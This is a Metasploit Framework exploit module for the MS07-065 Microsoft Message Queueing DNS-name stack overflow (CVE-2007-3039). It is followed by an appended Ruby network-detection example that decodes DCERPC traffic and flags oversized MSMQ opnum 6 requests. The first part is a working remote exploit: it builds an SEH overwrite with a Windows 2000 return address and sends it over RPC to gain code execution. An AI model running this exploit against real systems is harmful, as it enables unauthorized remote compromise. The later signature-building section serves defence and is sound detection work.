##
# $Id: ms07_065_msmq.rb 9929 2010-07-25 21:37:54Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::DCERPC
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft Message Queueing Service DNS Name Path Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in the RPC interface
				to the Microsoft Message Queueing service. This exploit requires the
				target system to have been configured with a DNS name and for that
				name to be supplied in the 'DNAME' option. This name does not need
				to be served by a valid DNS server, only configured on the target
				machine.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9929 $',
			'References'     =>
				[
					[ 'CVE', '2007-3039'],
					[ 'OSVDB', '39123'],
					[ 'MSB', 'MS07-065'],
				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'           => 1024,
					'BadChars'        => "\x00\x0a\x0d\x5c\x5f\x2f\x2e\xff",
					'StackAdjustment' => -3500,
				},
			'Targets'        =>
				[
					[ 'Windows 2000 Server English',
						{
							'Platform' => 'win',
							'Ret'      => 0x75022ac4 # ws2help - pop/pop/ret
						},
					],
				],
			'DisclosureDate' => 'Dec 11 2007',
			'DefaultTarget'  => 0))

		# Change the default port values to point at MSMQ
		register_options(
			[
				Opt::RPORT(2103),
				OptString.new('DNAME', [ true, "The DNS hostname of the target" ]),
			], self.class)
	end

	def autofilter
		# Common vulnerability scanning tools report port 445/139
		# due to how they test for the vulnerability. Remap this
		# back to 2103 for automated exploitation
		rport = datastore['RPORT'].to_i
		if ( rport == 445 or rport == 139 )
			datastore['RPORT'] = 2103
		end

		# The fqdn is required to exploit this bug
		if (not datastore['DNAME'])
			# XXX automatically determine the hostname
			return false
		end

		true
	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")
		handle = dcerpc_handle('fdb3a030-065f-11d1-bb9b-00a024ea5525', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
		print_status("Binding to #{handle} ...")
		dcerpc_bind(handle)
		print_status("Bound to #{handle} ...")

		dname = datastore['DNAME']
		boom  = rand_text_alphanumeric(4096)

		hname, domain = dname.split(".")

		if(not domain)
			print_status("The DNAME parameter specified is not valid.")
			print_status("This option must be the fully-qualified domain name of the target (as it has been configured).")
			return
		end

		off = 310 - (hname.length * 2)
		seh = generate_seh_payload(target.ret)
		boom[off, seh.length] = seh

		buff = Rex::Text.to_unicode("#{dname}\\")
		buff << boom
		buff << "\x00\x00"

		# Data alignment
		while(buff.length % 4 != 0)
			buff << "\x00"
		end

		stubdata =
			NDR.long(1) +                                      # [in] long arg_1,
			NDR.UnicodeConformantVaryingStringPreBuilt(buff) + # [in][string] wchar_t * arg_2,
			NDR.long(0) * 5                                    # ... fields we can ignore

		print_status('Sending exploit...')

		begin
			response = dcerpc.call(6, stubdata)
			if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
				case dcerpc.last_response.stub_data
				when "\x14\x00\x0e\xc0"
					print_error("Error: The wrong value has been supplied for the DNAME parameter")
					print_error("This value must be the fully-qualified domain name of the target")
					print_error("Many systems have no FQDN configured and cannot be exploited")
				else
					print_status("An unknown response was received from the server:")
					print_status(">> " + dcerpc.last_response.stub_data.unpack("H*")[0])
				end
			end
		rescue Rex::Proto::DCERPC::Exceptions::NoResponse
			print_status("No response from the DCERPC service (this is usually a good thing).")
		end

		handler
		disconnect
	end

end
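The module above gives a defender three concrete handles for a network signature: the MSMQ RPC interface UUID it binds to (fdb3a030-065f-11d1-bb9b-00a024ea5525, version 1.0), the port it targets (2103) and the stub layout it sends to opnum 6 (a leading NDR long followed by a conformant varying wide string that should only ever hold a hostname). The following is an added example, not code from the module or from the Metasploit Framework: a small connection-oriented DCERPC bind/request decoder in plain Ruby that replays that shape over constructed sample PDUs and reports when the opnum 6 string is far longer than any hostname. The PDU encoding follows the standard DCE/RPC CO header and NDR wire formats; the 512-wide-character threshold, the `host.example.test` name and the sample streams are assumptions constructed for this example.

```ruby
# Added example, not part of the Metasploit module above: decode DCERPC
# bind and request PDUs from one TCP stream and flag an MSMQ opnum 6 call
# whose string argument is implausibly long. Sample PDUs are constructed.

MSMQ_IFACE_UUID = 'fdb3a030-065f-11d1-bb9b-00a024ea5525' # from the module
MSMQ_PORT       = 2103                                   # from the module
PTYPE_REQUEST   = 0
PTYPE_BIND      = 11
NDR_SYNTAX_UUID = '8a885d04-1ceb-11c9-9fe8-08002b104860' # standard NDR transfer syntax

# DCERPC writes the first three UUID fields little-endian and the
# remaining eight bytes as printed.
def uuid_to_wire(str)
  a, b, c, d, e = str.split('-')
  [a.to_i(16), b.to_i(16), c.to_i(16)].pack('Vvv') + [d + e].pack('H*')
end

def wire_to_uuid(bytes)
  a, b, c = bytes[0, 8].unpack('Vvv')
  rest = bytes[8, 8].unpack1('H*')
  format('%08x-%04x-%04x-%s-%s', a, b, c, rest[0, 4], rest[4, 12])
end

# 16-byte CO header: version 5.0, ptype, first+last flags, LE/ASCII data
# representation, frag_length, auth_length, call_id.
def dcerpc_header(ptype, body_len, call_id = 1)
  [5, 0, ptype, 0x03, 0x10, 0, 0, 0, 16 + body_len, 0, call_id].pack('C8vvV')
end

# Bind PDU carrying one presentation context (one abstract syntax, one transfer syntax).
def build_bind(iface_uuid, major, minor)
  ctx  = [0, 1, 0].pack('vCC') + uuid_to_wire(iface_uuid) + [major, minor].pack('vv')
  ctx += uuid_to_wire(NDR_SYNTAX_UUID) + [2, 0].pack('vv')
  body = [5840, 5840, 0].pack('vvV') + [1, 0, 0].pack('CCv') + ctx
  dcerpc_header(PTYPE_BIND, body.length) + body
end

# Request PDU: alloc_hint, p_cont_id, opnum, then the NDR stub.
def build_request(opnum, stub)
  body = [stub.length, 0, opnum].pack('Vvv') + stub
  dcerpc_header(PTYPE_REQUEST, body.length) + body
end

# NDR conformant varying wide string: max_count, offset, actual_count, UTF-16LE data.
def ndr_wstring(str)
  data = str.encode('UTF-16LE').b
  n = data.length / 2
  [n, 0, n].pack('VVV') + data
end

# Abstract syntax of the first presentation context, or nil for non-bind PDUs.
def parse_bind(pdu)
  return nil unless pdu.getbyte(2) == PTYPE_BIND
  ctx = pdu[28, 24] # header (16) + max_xmit/max_recv/assoc_group/n_ctx+padding (12)
  major, minor = ctx[20, 4].unpack('vv')
  { iface: wire_to_uuid(ctx[4, 16]), version: "#{major}.#{minor}" }
end

def parse_request(pdu)
  return nil unless pdu.getbyte(2) == PTYPE_REQUEST
  frag_len = pdu[8, 2].unpack1('v')
  { opnum: pdu[22, 2].unpack1('v'), stub: pdu[24, frag_len - 24] }
end

# Walk one TCP stream given as [dst_port, pdu] pairs. Alert when a bind to the
# MSMQ interface is followed by opnum 6 whose second argument (the wide string
# after the leading long, per the module's stub layout) is far longer than a
# hostname. The 512-wide-character threshold is an assumption for this example.
def msmq_overflow_indicators(stream, max_wchars: 512)
  alerts = []
  bound = false
  stream.each do |port, pdu|
    next unless port == MSMQ_PORT
    if (b = parse_bind(pdu))
      bound = (b[:iface] == MSMQ_IFACE_UUID)
      next
    end
    req = parse_request(pdu)
    next unless bound && req && req[:opnum] == 6
    _max, _off, actual = req[:stub][4, 12].unpack('VVV')
    alerts << "MSMQ opnum 6 wide string of #{actual} chars exceeds #{max_wchars}" if actual > max_wchars
  end
  alerts
end

# Stub shape taken from the module: one long, the wide string, five ignored longs.
def msmq_stub(name)
  [1].pack('V') + ndr_wstring(name) + [0].pack('V') * 5
end

# Constructed sample streams: a hostname-sized call and an oversized one.
SAMPLE_BENIGN  = [[MSMQ_PORT, build_bind(MSMQ_IFACE_UUID, 1, 0)],
                  [MSMQ_PORT, build_request(6, msmq_stub('host.example.test\\'))]]
SAMPLE_SUSPECT = [[MSMQ_PORT, build_bind(MSMQ_IFACE_UUID, 1, 0)],
                  [MSMQ_PORT, build_request(6, msmq_stub('host.example.test\\' + 'A' * 2048))]]

puts msmq_overflow_indicators(SAMPLE_BENIGN).inspect  # []
puts msmq_overflow_indicators(SAMPLE_SUSPECT).inspect
```

The check is deliberately stateful: it only counts the opnum 6 request after a bind to the MSMQ interface on the same stream, which keeps the length rule from firing on unrelated RPC services that share the port. The same decoder can be pointed at the module's `autofilter` remap (scanners reporting 445/139) by adding those ports to the `port` test, but the MSMQ interface UUID, not the port, is what identifies the traffic.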